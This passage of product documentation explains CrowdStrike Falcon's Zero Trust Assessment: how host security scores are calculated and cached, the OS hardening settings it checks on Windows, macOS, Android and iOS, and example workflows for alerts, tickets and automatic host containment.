- Investigate Views: View Falcon Investigate
- Investigate Views: Write Investigate
- Investigate Views: Write Investigate Data

Note: ZTA monitors OS settings for all platforms except Linux. ZTA monitors Falcon sensor settings for all platforms.

Understanding Zero Trust Assessment

Use the Zero Trust Assessment dashboard to:

View the security posture of your hosts as represented by a security score.
Identify hosts with OS or sensor configurations that might introduce risk.
Support auditing measures by reporting on specific settings across managed hosts.

Security score

Zero Trust Assessment calculates a security score from 1 to 100 for each host. A higher score indicates a better security posture for the host. A security score is specific to the unique configurations of your environment. Zero Trust Assessment does not define what constitutes a good score. Instead, the ZTA dashboard provides visibility into possible risks and insight into settings that can increase the security posture of hosts.

Security scores are derived from two distinct assessment sources:

OS settings: Settings that track built-in OS security options, firmware availability, and Common Vulnerabilities and Exposures (CVE) mitigations.

For more info about specific OS settings, see Understanding OS setting requirements.

Note: OS settings aren’t available for Linux.
Falcon sensor settings: Falcon sensor configurations that track reduced functionality mode (RFM) status as well as prevention and Real Time Response policies.

When a change is detected in either the OS or sensor settings, security scores are updated. The Falcon sensor must be restarted for ZTA to detect changes to Windows OS settings. ZTA automatically assesses changes for macOS every 24 hours and a sensor restart isn't required. Restart the sensor to see macOS updates immediately. Android and iOS sensors assess changes every 24 hours or sooner, depending on the signal. The dashboard is automatically updated on an hourly basis.

A host’s security score is also dependent on the ZTA version used to assess the host. This version appears in the ZTA dashboard next to each host’s score. ZTA versions are updated by CrowdStrike to account for changes in how security scores are calculated. For example, if a new prevention policy becomes available in Falcon, ZTA calculations are updated to account for the new policy. Hosts are then assessed based on the new ZTA version and whether they meet the new requirement.

Security score caching

ZTA security scores are cached differently for macOS and Windows systems.

For macOS systems, after ZTA security scores are sent to the sensor from the cloud, the sensor stores the score in a data.zta file. If caching is enabled, the sensor also stores the data in an internal database.

When the sensor shuts down, the sensor removes the data.zta file. When the sensor restarts, the sensor waits for scores from the cloud before creating the data.zta file. If caching is enabled, the sensor copies the scores from the internal database and writes them to the the data.zta file. When the cloud sends new scores, the sensor updates the data.zta file and the database.

For Windows systems, after ZTA security scores are sent to the sensor from the cloud and caching is enabled, the sensor writes the score to a data.zta file. When the sensor restarts, the data.zta file is used to provide a score until a new one is provided by the cloud.

If caching is disabled, when the sensor shuts down, the sensor removes the data.zta file. When the sensor restarts, it doesn't have a data.zta file, so no security score is reported until a new file is provided by the cloud.

Note: You can enable or disable ZTA caching by opening a CrowdStrike support ticket or contacting your Technical Account Manager.

Getting to the Zero Trust Assessment dashboard

To access the Zero Trust Assessment dashboard, go to Host setup and management > Manage endpoints > Zero trust assessment.

Working with Zero Trust Assessment information

The Zero Trust Assessment dashboard includes aggregated data about the security posture of all hosts, as well as granular details of each assessed host.

You can work with the data of the entire dashboard with these options:

Update data: ZTA data used to populate the dashboard is updated every hour.
Export data: Export up to 10,000 records at a time in CSV format.
Filter by CID: If you have multiple CIDs, you can use the Customer ID filter to show info for just one CID.
Filter by platform: View data for only Mac hosts, Linux hosts, or Windows hosts using the Platform filter.

Viewing aggregate ZTA data

Gather a holistic assessment of the security posture of your hosts with these aggregate measures:

Average assessment score over last 7 days
Average assessment score today
Hosts evaluated over the last 30 days
Hosts by assessment score: Hosts are grouped into tiers according to today’s score. You can click a score range to filter the Assessment by agent ID table and show hosts with a security score that falls within the selected range.
Failing assessments with highest host counts over the last 30 days: These assessment items were identified as non-compliant for the highest number of hosts. You can click an assessment item to filter the Assessment by Host table to show only hosts that do not meet the requirement for that assessment item.

Viewing ZTA data by host

Identify specific hosts that might require further attention using these tables:

Assessment by host: This table includes an OS assessment, a sensor assessment, and an overall assessment for each host, giving you an overview of the security posture.
- Use the Search by host ID or hostname, Score range, and Assessment fields to filter the list of hosts.
- Select a host to show more specific info in the Host details table.
Host details: This table displays info for the host selected in the Assessment by host table. For each assessment item, this table indicates if the host meets the required setting to be considered compliant.
- Use the Assessment category filter to show only OS or sensor assessment items.
- View the priority level of assessment items in the Priority column. If an assessment item doesn't meet the requirement, the priority level is displayed with a color code. Addressing higher priority assessment items as quickly as possible most dramatically increases the security posture of a host and improves its ZTA score. Each assessment item is displayed with one of these priority levels:
  - Immediate (red)
  - High (orange)
  - Moderate (yellow)
  - Low (khaki, or light brown)
- To manage sensor policies and increase the security posture of the selected host, click Open in Host Management.
- OS settings can’t be modified in the Falcon console and must be managed on the host itself. For more info about specific OS settings, see Understanding OS setting requirements.
- The Last updated field indicates when the host was last assessed. ZTA automatically reassesses a host only when a change to one of the assessment items is detected. Changes to Windows OS or macOS settings require a restart of the Falcon sensor to be detected by ZTA.
  
  Note: This field does not indicate when the dashboard was last updated, only when the host was last assessed. The ZTA dashboard data is updated hourly.

Understanding OS setting requirements

These brief descriptions give an overview of each OS setting monitored by ZTA. For complete details, refer to the applicable platform vendor documentation.

Windows OS security settings

OS security setting	Description	ZTA requirement
Unified Extensible Firmware Interface (UEFI)	Unified Extensible Firmware Interface (UEFI) is low-level software that starts when a PC is booted, before the operating system boots up. It’s a replacement for traditional BIOS on a PC. Compared to BIOS, it’s a more modern solution supporting larger hard drives, faster boot times, more security features, graphics, and mouse cursors. A system can be set to run in UEFI enabled or disabled mode and Compatibility Support Module (CSM) state for BIOS-like downgraded performance. This ZTA requirement ensures the host has UEFI compatible firmware irrespective of its enablement status.	Running
Unified Extensible Firmware Interface (UEFI)	Enabling Unified Extensible Firmware Interface (UEFI) provides greater security for a system, particularly in protecting the memory during boot time. Apart from aiding Secure Boot to ensure trusted software loads in a system, UEFI firmware also provides memory protection preventing malicious code from tampering with the firmware and operating system components loaded into memory. This ZTA requirement ensures the host with UEFI compatible firmware has the boot mode set to UEFI and not in disabled or CSM modes.	Available
Secure Boot	Secure Boot is a security standard developed by members of the PC industry to help make sure a device boots using only software that is trusted by the original equipment manufacturer (OEM). When the PC starts, the firmware checks the signature of each piece of boot software, including UEFI firmware drivers, EFI applications, and the operating system. If the signatures are valid, the PC boots and the firmware gives control to the operating system.	Enabled
Virtual Secure Mode (VSM)	Virtualization-based security uses hardware virtualization features to create and isolate a secure region of memory from the normal operating system. Windows can use VSM to host a number of security solutions, providing them with increased protection from vulnerabilities in the operating system, and preventing the use of malicious exploits that attempt to defeat protections. VSM is required for Credential Guard to be enabled.	Available
Memory Overwrite Request Control	Memory Overwrite Request Control is a setting for Secure Memory Overwrite Request or Secure MOR. Secure MOR enhances Credential Guard to prevent advanced memory attacks. It further protects UEFI variables so when the system is running, even the kernel can’t modify variables that the firmware has identified need more protection. This setting is automatically enabled on Windows hosts.	Enabled
Hardware Security Testability Specifications (HSTI)	Hardware Security Testability Specifications (HSTI) protects against misconfiguration of security features on Windows devices. It provides best effort assurance that the machine is secure by default. The results of HSTI tests are consumed by Windows compatibility tests and can be used to verify that devices have been properly configured to enable supported security features.For more info, see the Microsoft article Hardware Security Testability Specification.	Available
System Management Mode (SMM) Protections	System Management Mode (SMM) code executes at the highest privilege level and is invisible to the OS, which makes it an attractive target for malicious activity. Windows automatically enables SMM protections if available. SMM protection uses a hardware-enforced processor feature known as a supervisor SMI handler to monitor the SMM and make sure it doesn’t access any part of the address space that it isn’t supposed to.	Available
Input-output Memory Management Unit (IOMMU)	Input-output Memory Management Unit (IOMMU) offers additional security against direct memory attacks. If available, it is automatically leveraged as part of Windows Memory Access Protection. This ZTA assessment item checks if IOMMU is available on the host.	Available
Input–output Memory Management Unit (IOMMU) In Use	Input-output Memory Management Unit (IOMMU) offers additional security against direct memory attacks. If available, it is automatically leveraged as part of Windows Memory Access Protection. This ZTA assessment item checks if IOMMU is in use. If IOMMU is available but not running then something may have occurred to prevent its use.	In use
Memory Access Protection	Also known as Kernel DMA Protection, Memory Access Protection prohibits direct memory access (DMA) attacks. This setting is disabled by default in older devices but Windows automatically enables it if supported by the device's hardware.For more info, see the Microsoft article Kernel DMA Protection (Memory Access Protection) for OEMs.	Enabled
Mode Based Execution Control (MBEC)	Supported in Windows 10 version 1803 and later, Mode Based Execution Control (MBEC) provides an extra layer of protection from malware attacks in a virtualized environment by enabling hypervisors to more reliably verify and enforce the integrity of kernel-level code. Windows leverages this automatically if it is available.	Available
Secure Kernel	Secure Kernel is leveraged by virtualization-based security to secure its kernel which runs at a higher trust level than the NT kernel. When Windows executes code and stores data at the higher trust level, the standard NT kernel and user-mode processes can’t directly access the protected code and data.For more info, see the Microsoft article Introducing Kernel Data Protection, a new platform security technology for preventing data corruption.	Running
Credential Guard	Credential Guard uses virtualization-based security to protect your credentials. With Credential Guard enabled, only trusted, privileged applications and processes are allowed to access user credentials. This setting requires Secure Boot, UEFI, and VBS.For more info, see the Microsoft article Microsoft Defender Credential Guard hardware requirements. Note: Virtual Secure Mode (VSM) is required for Credential Guard to be enabled.	Running
Kernel Mode Code Integrity (KMCI)	Kernel Mode Code Integrity (KMCI) is enabled by default. When enabled, it ensures that all kernel mode drivers are signed. Those that aren’t signed can’t load. This setting requires Hypervisor Code Integrity to be enabled.	Enabled
Test Signing	Test Signing allows any and all things to run on the device. It should always be disabled.	Disabled
Debug Mode	When a host is in debug mode it is not secure.	Disabled
Undocumented Windows Beta	Undocumented Windows Betas are builds that are not officially part of Windows beta program and are not secure.	Disabled
Windows Insider ProgramRunning	Windows Insider Program (WIP) is an open software testing program by Microsoft. It allows users who own a valid license of Windows to register for pre-release builds of the operating system previously only accessible to software developers. A device running a beta version of Windows is less secure. Additionally, the sensor might be in reduced functionality mode (RFM).This ZTA assessment item checks if the Windows Insider Program is running on the host. The Windows Insider Program assessment item checks if the host is enrolled in the program but not if it is running.	Not running
Windows Insider Program	This setting checks if the host is registered as part of the Windows Insider Program (WIP). WIP is an open software testing program by Microsoft. It allows users who own a valid license of Windows to register for pre-release builds of the operating system previously only accessible to software developers.This ZTA assessment item checks if Windows Insider Program is enrolled, or enabled. The Windows Insider Program Running assessment item checks if the host is running the program.	Disabled
Hypervisor Code Integrity	Previously known as Device Guard, Hypervisor Code Integrity (HVCI) runs on a hypervisor, protecting against kernel attacks.	Enabled
Hypervisor Code Integrity (Strict Mode)	This is an additional layer of security for Hypervisor Code Integrity. If HVCI is active, then Strict Mode is enabled by default. If HVCI is enabled but Strict Mode is disabled, then something may have occurred to disable it.	Enabled
Extended Validation Mode	Extended Validation Mode requires all drivers to have an EV certificate. An EV certificate proves that the driver is signed by a certificate authority (CA). The CA verifies the requesting entity's identity and its operational status with its control over the domain name and hosting server.Rather than a single toggle, EV mode is a consequence of many different settings being enabled in addition to the OS or firmware to support them. For a host to be in EV-Mode, the machine's OS and firmware need to support virtual-based security features and both KMCI and HVCI must be enabled. Make sure your hosts can support these settings by testing them on a controlled group prior to any mass rollout.For more info, see the Microsoft article Windows 10 Device Guard and Credential Guard Demystified.	Enabled
Script Enforcement	Script Enforcement prohibits unsigned PowerShell scripts and interactive PowerShell from running on the host.	Enabled
Branch Target Injection Mitigation	This requirement monitors whether mitigations are in place to defend against branch target injection (CVE-2017-5715).	Active
Branch Target Injection Mitigation Registry Status	This requirement is based on the registry status for mitigations required to prevent branch target injection. The status for these mitigations must not be disabled in the registry.	Not disabled in the registry
Branch Target Injection Mitigation Hardware Support	This requirement determines if the host’s hardware supports the mitigations required to prevent branch target injection.	Supported by hardware
Branch Target Injection Mitigation Patch	This requirement ensures the host has applied the relevant patches to prevent branch target injection.	System patched against CVE-2017-5715
Rogue Data Cache Load Mitigation	This requirement ensures mitigations are in place to defend against Rogue Data Cache Load (CVE-2017-5754).	Enabled
Rogue Data Cache Load Patch	This requirement ensures the host has applied the relevant patches to prevent Rogue Data Cache Load.	System patched against CVE-2017-5754
L1 Terminal Fault Mitigation	This requirement ensures mitigations are in place to defend against L1 Terminal Fault (CVE-2018-3620).	Enabled
Speculative Store Bypass Mitigation Available	This requirement ensures the host’s OS contains the mitigation for Speculative Store Bypass (CVE-2018-3639). Speculative Store Bypass Mitigation Hardware Support must be enabled.	Active
Speculative Store Bypass Mitigation Hardware Support	This requirement ensures the host’s hardware supports the mitigation for Speculative Store Bypass, CVE-2018-3639, and that it is automatically enabled by the OS.	OSSupported by hardware

macOS security settings

Note: These macOS security settings require a minimum version of Falcon sensor for Mac. If a host does not meet this requirement, the status of the applicable assessment item is Unknown and the host is assessed as non-compliant.

OS security setting	Description	ZTA requirement	Falcon sensor minimum requirement
FileVault	FileVault is Apple’s method of data encryption. When FileVault is enabled, the entire drive is encrypted unless accessed by user credentials. Even if a device is stolen, without a valid username and password, the data is safe.	Enabled	6.33
Remote Login	Disabling Remote Login prevents access to the device using Secure Shell (SSH) and admin credentials.	Disabled	6.33
Gatekeeper	Protects the device from launching malicious applications by enforcing code signing and limiting the sources that applications can be downloaded from. On macOS 10.15 and later, Gatekeeper also performs a malicious content scan and signature validation periodically to check that code has not been tampered with.	Enabled	6.33
Stealth Mode	Stealth Mode ensures that macOS ignores network discovery attempts from a closed Transmission Control Protocol (TCP) or User Datagram Protocol (UDP) network.	Enabled	6.33
System Integrity Protection (SIP)	System Integrity Protection (SIP) prevents even root users from taking any action on critical system files. Enabling SIP eliminates the chance of a Mac from being subject to malicious runtime attachments.	Enabled	6.33
Internet Sharing	Internet Sharing allows a Mac device to share a network connection with other devices.	Disabled	6.33
Analytics & Improvements	Analytics & Improvements automatically collects diagnostics information, captured audio, crash logs, and more in order to help Apple and other third-party vendors improve their solutions.	Disabled	6.33
Application Firewall	Application Firewall prevents network ports from being occupied by anything other than priority applications, controlling connections for individual apps.	Enabled	6.39
System Full Disk Access	System Full Disk Access allows selected apps to access data from Mail, Messages, Safari, Home, Time Machine backups, and certain administrative settings for all users on the device. This setting should be disabled for everything except CrowdStrike apps. Important: If this setting is controlled by a mobile device management solution (MDM), ZTA only monitors changes made by MDM and does not monitor changes made manually on the host in Security & Privacy system preferences. Additionally, if you manage FDA using an MDM profile, the host’s System Preferences might not accurately reflect the current setting.	Disabled for all but CrowdStrike apps	6.39
CrowdStrike Full Disk Access	CrowdStrike Full Disk Access allows CrowdStrike apps to access necessary data, info, and certain administrative settings on the device. For more info, see Falcon sensor for Mac. Important: If this setting is controlled by a mobile device management solution (MDM), ZTA only monitors changes made by MDM and does not monitor changes made manually on the host in Security & Privacy system preferences. Additionally, if you manage FDA using an MDM profile, the host’s System Preferences might not accurately reflect the current setting.	Enabled for CrowdStrike apps	6.39

Android OS security settings

OS security setting	Description	ZTA requirement
App side loading	One or more apps other than the Google Play Store have been given permission to install other apps.	False
Bootloader unlocked	The bootloader of the device is unlocked.	False
Developer options enabled	Developer Options is enabled in the system Settings app.	False
Falcon app trusted	The version of the CrowdStrike Falcon app communicating with the cloud is legitimate.	True
Google Play Protect enabled	The user has not disabled Google Play Protect, which scans installed apps on the device.	True
Key store trusted	If the key store is not trusted, cryptographic operations managed by the device might not be secure.	True
Lock screen set	A lock screen is required to prevent unauthorized use of the device by anyone with physical access to it.	True
Device integrity	The device is not rooted. Root access bypasses the built-in security restrictions of the operating system. Attackers can gain easier access to operating system code and resources, and take over the device.	Intact
SELinux enabled	If the SELinux module is disabled, the device is more vulnerable to apps violating Android's access control policy and to privilege escalation attacks.	Enforced
Storage encrypted	Encryption protects the sensitive data on your phone by storing it in an unreadable form.	True
Verified boot state	Android Verified Boot (AVB) is able to trust the integrity and authenticity of the system's boot stages.	True
VPN status	The Falcon for Mobile VPN monitors and protects network traffic.	Enabled

iOS OS security settings

OS security setting	Description	ZTA requirement
Jailbroken	Checks if the device is jailbroken. Devices that are jailbroken have had built-in security restrictions bypassed and could be compromised.	False
Lockdown mode	Confirms if lockdown mode is enabled. Devices that have lockdown mode enabled are more secure.	True
Lock screen set	A lock screen is required to prevent unauthorized use of the device by anyone with physical access to it.	True
Network extension type	This setting displays the configuration profile applied to the device. Content Filter profiles provide system-wide network protection. Per-App VPN profiles limit network protection to certain apps.	Content Filter

Integrating ZTA with partner apps

Zero Trust Assessment can be integrated with third-party apps from CrowdStrike partners. Identity Provider (IdP) or Network Access Control (NAC) partners can use the ZTA score of an eligible host to help determine its security posture and leverage that metric as part of their conditional access capabilities.

To enable integration with a CrowdStrike partner, contact Support. For US-GOV-1 and US-GOV-2 customers, contact Support.

Note: These third-party integrations are supported only for Windows, Mac, and Linux hosts.

Zero Trust Assessment workflows

To automate notifications and other Zero Trust Assessment workflows, set up Falcon Fusion SOAR workflows. Use Fusion SOAR triggers, conditions, and actions to define what happens in response to host assessment changes and assessment failures. Build workflows such as the examples listed in this section, or build more complex workflows in Fusion SOAR. For more info about workflows, see Fusion SOAR.

This table shows you some examples of actions you can use in workflows with ZTA triggers.

Table 1. Available ZTA Triggers
Action	Host assessment change trigger	Aggregate assessment change trigger
Email notification	x	x
Slack notification	x	x
MS Teams notification	x	x
Webhook notification	x	x
ServiceNow ticket	x	x
Jira ticket	x	x
RTR command execution	x
Network containment	x

Before you begin

Use the Overall score trigger type rather than the All subcategory for workflows that trigger on host score changes. This avoids duplicate executions, as the All subcategory triggers for both OS and sensor score changes.
For new hosts, assessments could trigger workflows before host details are fully populated, which can result in empty emails and tickets. Use conditions to help alleviate this possibility.

Send notifications on host assessment changes

Set up a workflow to send a notification when a host’s assessment falls below a threshold. Use these triggers, conditions, and actions to send a Slack notification if a host’s OS assessment falls below 80.

Trigger: Zero Trust Assessment > Host assessment change > OS score
Conditions: OS assessment is less than 80
Actions: Notify - Slack

Send notifications and open incidents when assessments fail

Set up a workflow to send a notification and create a ServiceNow ticket when a macOS System Integrity Protection (SIP) assessment fails. Use these triggers, conditions, and actions to send a webhook notification when an OS doesn’t match a specific build:

Trigger: Zero Trust Assessment > Host assessment change > Overall score
Conditions:
- Failed assessments include System Integrity Protection (SIP)
- OS build is equal to macOS
Actions:
- Notify - Call webhook
- ServiceNow - Create ServiceNow incident

To create a ServiceNow incident as part of a Falcon Fusion SOAR workflow, install the ServiceNow ITSM SOAR Actions plugin from the CrowdStrike store. For more information, see Integrate with ServiceNow.

Send notifications and open incidents on aggregate assessment

Set up a workflow to send a notification and open a ServiceNow incident when the aggregate assessment is computed. Use these triggers, conditions, and actions to send an email notification and create a ServiceNow ticket when the average aggregate assessment falls below 85.

Trigger: Zero Trust Assessment > Aggregate assessment
Conditions: Average overall assessment is less than 85
Actions:
- Notify - Send email
- ServiceNow - Create ServiceNow incident

Contain a host automatically

Set up a workflow to automatically contain a host when its sensor assessment falls below a threshold. Use these triggers, conditions, and actions to contain a host if its assessment falls below 75.

Trigger: Zero Trust Assessment > Host assessment change > Sensor assessment
Conditions: Sensor assessment is less than 75
Actions: Contain > Contain device